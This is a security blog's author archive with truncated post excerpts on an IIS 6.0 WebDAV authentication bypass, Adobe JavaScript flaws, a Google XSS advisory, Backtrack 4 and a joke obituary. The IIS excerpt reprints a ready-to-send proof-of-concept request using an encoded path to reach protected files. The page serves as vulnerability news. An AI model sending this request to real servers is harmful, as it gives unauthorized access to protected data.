Author Archive
IIS 6.0 WebDav Exploit, Adobe 8-9.1 JavaScript Exploits, Cisco Works TFTPD Directory Traversal
Microsoft IIS 6.0 with WebDAV is vulnerable to an authentication bypass. The exploit has already been made public:
http://www.milw0rm.com/exploits/8704
Proof of concept taken from above URL:
GET /prot%c0%afected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: servername
Adobe versions 8-9.1 have been smacked with more JavaScript command execution bugs. A lot of vendors are starting to recommend disabling JavaScript, something I suggested back [...]
Universal XSS Vulnerability in Google
It does worry me when Google services get hacked with a Cross Site Scripting vulnerability that compromises just about everything.
Inferno released an advisory in Bugtraq stating that he discovered a method of exploiting the following Google items (to name a few):
1. Steal your emails.
2. Steal your contacts.
3. Steal your documents.
4. Steal your code.
5. Steal your [...]
TCP/IP Security Assessment, FreeBSD Telnet 0-Day, RainbowCrack 1.3, Nokia N95 DoS, Bounty for Worm Author
TCP/IP Security Assessment
The United Kingdom’s Centre for the Protection of National Infrastructure has just released the document “Security Assessment of the Transmission Control Protocol (TCP)”.
I find the document title a little ambiguous, as a security assessment generally refers to active research, whereas, from my brief overview, it is in fact more of a whitepaper giving an [...]
Hacker News: Backtrack 4 Beta, Web Services Testing, Monster Hacked and More
Backtrack 4 BETA released
The guys at Backtrack have released Backtrack 4 BETA. Cool changes include Kernel 2.6.28.1 with better hardware support, Pico e12, e16 support, better wireless injection support, RFID support and a bunch of new tools.
Fasttrack security tool gets spotlight
David Kennedy’s Fasttrack tool got high reviews after Shmoocon. It provides a CLI and a cool [...]
IWAS-P Hero Dies Before Conference
GOLD COAST, Australia— Many mourned upon hearing that famous super hacker, Bruce Blubber, 21, had died before giving his long awaited talk, “He’s just not that into you”.
Close friends made the effort to poke his Facebook profile with messages of love and condolences to his friends and family. One friend, Kevin, repeatedly superpoked him. [...]

